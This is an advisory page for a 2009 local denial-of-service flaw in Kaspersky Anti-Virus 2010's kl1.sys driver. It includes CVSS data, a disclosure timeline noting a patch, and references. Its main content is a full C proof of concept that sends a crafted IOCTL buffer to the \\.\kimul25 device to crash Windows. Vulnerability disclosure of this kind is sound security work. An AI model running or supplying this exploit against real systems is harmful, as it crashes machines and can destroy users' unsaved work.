Kaspersky Anti-Virus 2010 <= 9.0.0.463 pointer dereference vulnerability

2009-12-02 / 2009-12-03
Credit: Heurs
Risk: High
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/* Program : Kaspersky Anti-Virus 2010 9.0.0.463 Homepage : http://www.kaspersky.com Discovery : 2009/09/29 Author Contacted : 2009/10/01 Patch Updated : 2009/11/16 Found by : Heurs This Advisory : Heurs Contact : s.leberre (at) sysdream (dot) com [email concealed] //----- Application description The most trusted virus and spyware protection - premium protection against viruses, spyware, Trojans, worms, bots and more. Also includes comprehensive phishing and identity theft defense and superfast performance. //----- Description of vulnerability kl1.sys driver don't check inputs address of an IOCTL. An exception can be thrown if we modify one or two DWORDs. With my test I can't do best exploitation than a BSOD. //----- Credits http://www.sysdream.com http://ghostsinthestack.org s.leberre at sysdream dot com heurs at ghostsinthestack dot org //----- Greetings Trance */ #include <stdio.h> #include <windows.h> #include <winioctl.h> #include <stdlib.h> #include <string.h> int __cdecl main(int argc, char* argv[]) { HANDLE hDevice = (HANDLE) 0xffffffff; DWORD NombreByte; DWORD Crashing[] = { 0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 0xb5ebadc5 }; BYTE Out[0x20]; printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXIST ING,0,NULL); DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof( Out),&NombreByte,NULL); printf("Sploit Send.\nhDevice = %x\n", hDevice); CloseHandle(hDevice); getch(); return 0; }

References:

http://xforce.iss.net/xforce/xfdb/54309
http://www.vupen.com/english/advisories/2009/3286
http://www.securitytracker.com/id?1023198
http://www.securityfocus.com/bid/37044
http://www.securityfocus.com/archive/1/archive/1/507933/100/0/threaded
http://sysdream.com/article.php?story_id=323&section_id=78
http://secunia.com/advisories/37398
http://osvdb.org/60207


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top